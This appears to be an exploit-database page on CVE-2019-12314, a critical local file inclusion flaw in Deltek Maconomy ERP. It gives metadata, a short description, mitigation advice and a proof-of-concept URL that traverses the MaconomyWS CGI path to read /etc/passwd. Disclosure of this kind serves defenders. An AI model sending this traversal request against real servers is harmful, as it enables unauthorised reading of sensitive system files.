header-logo
Suggest Exploit
vendor:
Maconomy ERP
by:
JameelNabbo
9.8
CVSS
CRITICAL
Local File Inclusion (LFI)
22
CWE
Product Name: Maconomy ERP
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: CVE-2019-12314
CPE: a:deltek:maconomy
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2019

Maconomy Erp local file include

Maconomy ERP is vulnerable to Local File Inclusion (LFI) vulnerability. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable server. This can allow the attacker to read sensitive files from the server, such as the /etc/passwd file.

Mitigation:

The best way to mitigate this vulnerability is to ensure that the web application is properly configured to prevent directory traversal attacks. Additionally, the web server should be configured to deny requests to files outside of the web root directory.
Source

Exploit-DB raw data:

# Exploit Title: Maconomy Erp local file include
# Date: 22/05/2019
# Exploit Author: JameelNabbo
# Website: jameelnabbo.com
# Vendor Homepage: https://www.deltek.com
# Software Link: https://www.deltek.com/en-gb/products/project-erp/maconomy
# CVE: CVE-2019-12314
POC:

POC:
http://domain.com/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//LFI
Example
http://domain.com/cgi-bin/Maconomy/MaconomyWS.macx1.W_MCS//etc/passwd

Navigation

Suggest Exploit

Services By CQR